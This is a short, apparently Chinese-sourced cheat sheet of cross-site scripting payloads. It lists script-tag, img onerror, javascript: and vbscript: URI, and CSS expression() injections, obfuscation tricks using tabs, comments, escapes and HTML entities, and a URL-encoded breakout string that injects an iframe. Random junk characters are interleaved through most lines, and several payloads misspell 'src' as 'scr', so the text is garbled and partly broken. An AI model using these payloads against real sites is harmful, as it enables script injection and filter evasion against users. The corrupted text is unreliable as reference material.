<script>alert("跨站")</script> (最常用)& }4 x" m' A( M3 x; H
<img scr=javascript:alert("跨站")></img>9 c3 R) b* V4 j9 y4 T9 _. F
<img scr="javascript: alert(/跨站/)></img>5 p5 c; w5 k7 d Y' W# n& V$ {
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)- m1 ~; l8 l7 X* X
<img scr="#" onerror=alert(/跨站/)></img>
0 x; r m% O/ x& F<img scr="#" style="xss:expression(alert(/xss/));"></img>
6 B; D# s) b( D: ~2 W; v$ y# ~<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
w" U8 Z$ T2 b7 Q; N& A2 I+ P8 E9 H<img src=vbscript:msgbox ("xss")></img> q! F9 n' K" t
<style> input {left:expression (alert('xss'))}</style>0 | K' l, g- a1 g) s
<div style={left:expression (alert('xss'))}></div>
/ R$ }) B9 t5 \& K3 a4 I0 t4 z. H<div style={left:exp/* */ression (alert('xss'))}></div>; |& M1 k5 ?1 \, N4 V) q0 k7 D% R( [
<div style={left:\0065\0078ression (alert('xss'))}></div>
. w" _0 o9 G. ?! H* M% uhtml 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
6 u2 O* L% I" m6 |0 L: J& j/ Nunicode <div style="{left:expRessioN (alert('xss'))}">
/ v7 o- U2 A8 L/ p+ `7 C9 [% T* F4 g7 q% G, x
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["2 B7 ^6 U3 u% a7 ^% l& q" _5 A' u3 K( T' t
|